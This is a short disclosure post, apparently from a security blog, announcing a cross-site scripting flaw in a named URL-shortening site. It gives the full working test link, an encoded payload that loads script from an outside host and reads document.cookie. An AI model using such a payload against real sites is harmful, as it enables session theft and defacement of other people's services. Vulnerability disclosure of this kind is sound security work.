PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me
This vulnerability has been informed to :- webmaster

Test Link 

http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

ModSecurity

ModSecurity is a web application firewall (WAF). With over 70% of attacks now carried out over the web application level, organisations need all the help they can get in making

Read More

Unrestricted File Upload @ Web-Based Teaching System Myanmar

Critical Unrestricted File Upload vulnerability found @ Web-Based Teaching System (Myanmar) URL : http://www.wbts.com.mm Malicious Attacker can upload some file to server without permission ! And It has persistent XSS

Read More

Cyber Attacks to Myanmar Media Sites

Last September 28, BurmeseHackers Group Hacked Irrawaddy Online Store twice, and we’ve been discussed about that. After a month, 27/09/2010: Irrawaddy, Mizzima and the Democratic Voice of Burma (DVB), were

Read More